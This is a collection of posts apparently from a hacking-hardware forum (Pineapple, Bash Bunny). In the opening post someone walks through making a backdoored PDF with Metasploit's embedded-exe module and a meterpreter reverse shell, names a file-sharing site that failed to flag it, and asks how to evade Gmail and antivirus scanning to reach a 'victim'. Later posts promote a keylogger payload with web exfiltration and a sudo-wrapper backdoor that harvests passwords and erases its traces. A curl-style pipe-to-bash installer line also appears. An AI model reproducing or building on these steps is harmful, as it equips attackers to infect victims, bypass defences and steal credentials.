  2. Hello! In this post, I am going to tell you how I embedded a backdoor in a PDF file and uploaded it onto the Internet. However, there are still some obscurities that I need YOUR help with.

     Step 1: Preparation
     Download a random PDF file from the internet and save it to the "root directory" (root directory --> go to "Places" and then "Home" and put it in there).

     Step 2: Forging the backdoored file
     - Go to a terminal and execute the command "msfconsole"
     - After that, execute the command "use exploit/windows/fileformat/adobe_pdf_embedded_exe"
     - After that, execute the command "set payload windows/meterpreter/reverse_tcp"
     - After that, execute the command "set INFILENAME PutTheNameOfThePdfFileAlongsideWithTheExtensionHere", so for example: set INFILENAME book.pdf
     - After that, execute the command "set FILENAME DesiredOutputFileName.pdf", so for example: set FILENAME LovePoem.pdf
     - After that, execute the command "set LHOST IpOfTheAttackerGoesHere" (your IP)
     - After that, execute the command "exploit"

     Step 3: Locating our creation
     After the backdoor has been successfully embedded in the PDF file, it is stored somewhere on the machine (it tells you where after the file is generated). Open up a terminal and execute "cd FileDestinationWithoutTheFileGoesHere". The output of the created file was:

         [*] Reading in '/root/book.pdf'...
         [*] Parsing '/root/book.pdf'...
         [*] Using 'windows/meterpreter/reverse_tcp' as payload...
         [*] Parsing Successful. Creating 'LovePoem.pdf' file...
         [+] LovePoem.pdf stored at /root/.msf4/local/LovePoem.pdf

     So open up the terminal and type "cd /root/.msf4/local/". After this command is executed, it moves our directory to the specified path. Then, execute the command "ls" to list all the files inside the directory.

     Step 4: Copying the file to desktop
     After the file is located using the cd and ls commands, it has to be copied.
     - Execute the command: cp /root/.msf4/local/LovePoem.pdf /root/Desktop/

     Step 5: Uploading the file on the web
     After the file is forged and retrieved to the desktop, it has to be uploaded to the internet. Popular file sharing networks such as MediaFire and Gmail have recognised the infected file, but a file sharing network called "SendSpace" didn't. You can easily upload the file there and send the link to the victim.

     So now I need your help to answer these questions:
     1. After the victim has downloaded the file (let's assume that the antivirus hasn't detected it), how can I gain remote access to it? (Which commands do I need to execute, etc.?)
     2. How can I prevent the infected file from being detected by Gmail and MediaFire?
     3. How can I prevent the infected file from being detected by the antivirus?

     I appreciate all the time taken to read this post or answer any of the questions :D
  3. I'm not a genius in the field, but yes, I'd assume that there would have to be some iptables trickery involved. Either that or port forward the traffic through your LT to the port on your kali box? lmk if you get it working!
  4. Hey all, I'm looking to buy a LT, but I had a few questions, and wanted your guys' thoughts on the ups/downs of the LT. My first question is heat management. Does this heat up? If so, has it ever become a problem for anybody? I'm somewhat concerned because my Bash Bunny gets pretty hot if you leave it running for too long. Second, for those who have been a part of the community since the beginning of the LT, what has module development looked like? Is the community active, or have things stalled? I ask this because I'm wondering if there are projects that I can contribute to when I get a LT. Thirdly, what has your guys' experience with the LT been? Good/bad? In between? How often do you guys use it? Thanks!
  5. Umm, no. They would basically be a 2.4 GHz jammer, which isn't legal. Just use the devices listed.
  6. Please, Please, Please anyone that reads this stop bothering Mubix with sales issues. This: https://hakshop.com/pages/policy
  7. OK, so update. It comes down to timing and just waiting, as you said. Jayson grabbed my ticket out of the queue and, after some explanation and bank statement screencaps, etc., the order was pushed through and is awaiting delivery. In regards to #3, there are specific instructions for dealing with the fraudulent flag, as it is almost a common occurrence, as is to be expected. This happened to me using three different cards. So, advice to future orders: stick with one card, and follow through. Don't just blame your own financial institution. Give THEM the hard time, as they have more than enough staff to listen to you bitch. Give the hak5 shipping team time to get hens in order and then swing back around with them once you get your bank squared away. The timing almost works perfectly if they are backlogged.
  8. Anyone have a solution?
  9. @diabolic It's by far my favorite use of the Nano... discreet, and you can grab the WPA handshake and work it offline. Everything else (URLSnarf, SSL, etc.) is somewhat intrusive. But this... it's just brilliant! What has worked for me is installing it to the SD card so there's never a question of space, and to go for a capture that is higher than 50% quality. Even then (last attempt) it failed to grab message 3 of 4 for the EAPOL, but it was close. Like the thread says, aircrack-ng is the fastest method and works on the Pineapple. Although I think it's much more flawless when a handshake is captured via my laptop than the Nano (both programs saying a handshake was captured).
  10. I'm also having trouble with this on a tetra running FW 1.1.2. Does anyone know what the root cause of this is? It's really annoying having bought this only to have to fall back to a laptop running kali. This is the simplest use case for this device and it consistently fails at it :(
  11. I'm pumped to try it out! As an FYI, I'm going to work in my spare time on completely hiding the PowerShell window so the target will only see the Win + R box.
  12. No luck over here... about the same error. It finished, with errors about not finding directories and such. Could very well be the SD card stuff everybody has mentioned in this thread. Although the card is fine anywhere else and I can get into it via ssh and whatever else. Launch-Mana... started to see some progress! But ultimately failed:

        hostapd-mana is running with pid: 3234
        DHCP Server is running with pid: 3248
        SSLstrip+ is running with pid: 3315
        DNS2Proxy is running with pid: 3317
        Exiting! (Error code: 6) SSLsplit was not launched correctly.
        Mana Toolkit has been shutdown.
  13. Great idea, well coded, may become really handy, thank you :)
  14. UPDATE: https://github.com/Vinc0682/bashbunny-payloads/tree/master/payloads/library/phishing/WinKeylogger
      The payload:
      - Is now faster (thanks to @jafahulo)
      - Now supports exfil via a webserver; just copy the backend.php to a server supporting PHP and copy the URI into the PowerShell script
      - Also, there've been some major changes to the keylogger to make adding future exfil methods (like the WIP SMB exfil) easier.
  15. I am unable to mount my USB even when formatted as ext4. Have tested with 2 SD cards now and they both fail. Here is my most recent problem: I suppose the problems are related to the SD cards and how the Pineapple mounts them. Really sad to see this, and when you check the bug list on the Pineapple it's filled with SD card problems. A better guide on how to mount USB would be appreciated; can the problem be due to the fstab? Also, when are you rolling MANA out as an official module?
  16. @Zylla Okay... factory reset, format SD card... rooted into Pineapple... running this script now.
  17. #1 - mubix is not the https://hakshop.com/, nor does he work in the shop/sales.
      #2 - If you put in an email for support, give it time. You (like many others) who have questions for store purchases often come here, and in general are only going to get the same answer: wait and be patient. If you sent them an email, you should have gotten a ticket # of some kind. Keep it handy. They will get back to you. As mentioned in other threads, there is a small crew who handles all store issues in general. Be patient.
      #3 - If payment was declined, there is probably nothing in their system other than your email. CC issues, I would say, are on your CC company's end. The only reason the store would cancel is if it was declined for funds (is my thinking, but I don't work at hak5, so wait to hear from them). If you already said they picked it up for potential fraud, that is where I would go, as it's probably the CC provider who blocked the purchase, or use a different payment method and try again. Since you haven't completed a purchase, you shouldn't have any charges to worry about. If it was canceled by hak5 (which is most likely all automated by the shopping cart stuff), I'd say make sure you can receive emails and nothing gets filtered for spam in case they did send one out about back-orders, etc. Even in back-orders though, I would think you'd get some kind of notice.
  18. Wouldn't it be different in 1.1?

        # Poll the Bash Bunny GET TARGET_IP helper until a target address has been assigned
        while [ -z "$TARGET_IP" ]; do
            GET TARGET_IP
            sleep 1
        done
  19. Ding ding, it's payload time. This is a two-stage payload. First you use the 'injector', which will install a small bash script that is a wrapper for sudo. The script will store the passwords. Second, you use the 'cleaner' to get the passwords back and clean the backdoor. So basically, you get access to a computer running MacOS or Linux (you can config the payload by setting mac=true) and you install the backdoor. A couple of hours/days/weeks later you come back, grab the passwords and erase traces. Easy. Link: https://github.com/oXis/bashbunny-payloads/tree/master/payloads/library/credentials/SudoBackdoor I'll submit a pull request, but first I need people to test this on MacOS and Linux. It works on my Linux Mint. Ninja!
  20. This seems to be really powerful when it comes to pranking friends, but since you already could have done it manually, either I didn't hear of it yet, or it isn't possible, or you are really the first one to think of that attack vector. When it comes to Android exfiltration, I would write an exfil app and then push it to the app like Demnsec did, or register the Bash Bunny as storage and then manually install and use a file manager, or use ADB to copy the files to the BB.
  21. The current online version already hides the PowerShell window, but since @jafahulo reworked the launching, it isn't needed anymore. Your window tracking idea is really interesting; I'm gonna try it after I've implemented the web (and maybe the SMB) exfil method.
  22. Yeah, that's a 404 error. The filename is out-dated. The correct filename is: hostapd-mana_2.6-2_ar71xx.ipk
      I suggest you use the INSTALL.sh script, which will set up everything automatically (except the module). You can download it using wget, or just enter this into your terminal:

        wget -qO- https://raw.githubusercontent.com/adde88/hostapd-mana/master/INSTALL.sh | bash -s -- -v -v
  23. Hi everyone, so the way @Dave-ee Jones asked for is 'best practice' to check whether the driver, e.g. for the * _ETHERNET attacks, had been successfully installed? And thanks to @qdba for your reply! @Sebkinne: Is there a 'built-in check' for being ready, or is that something for the wishlist?
  24. Hello, I'm unable to find the responder, which I know is required to perform QuickCreds. I even downloaded bashbunny-payloads-master but even then I couldn't find the tools_installer folder. Does anyone know where I can find the responder and how to transfer it to the correct folder, to perform QuickCreds?
  25. Something very useful for beginners. Thanks for the share.
  26. So I have an Arduino robot with a Bluetooth HC-05 module and was like... I should hack this and learn hacking. That was two weeks ago. Now I've seen all of Mike Ryan's work / YouTube, GitHub and other research on the Ubertooth from other people. I've seen the tutorials for Michael Ossmann's HackRF and SDR. And I've seen Samy's work, especially the drone hacking with his zombie attack where he uses an Alfa WiFi adapter. After reading a lot about BTLE, I was about to order an Ubertooth when it hit me: I'm not really interested in Bluetooth, even though I've been reading like a maniac. I'm interested in hacking robots. Obviously commercial drones use much more encrypted protocols, and that's not my beginning target. I've searched around and don't find the answers I'm looking for. So I try here with my first post: What wireless communication protocols do different robots use (rovers and drones, or automated machines and anything else robotic related, both consumer and commercial)? What hacking area should I research and later on purchase hardware for? Is it WiFi adapters for pentesting, or is it software defined radio and a HackRF? Is hacking a drone or a rover the same as hacking a computer through a wireless network? And if so, what topics are highly relevant to read and work with? Thanks.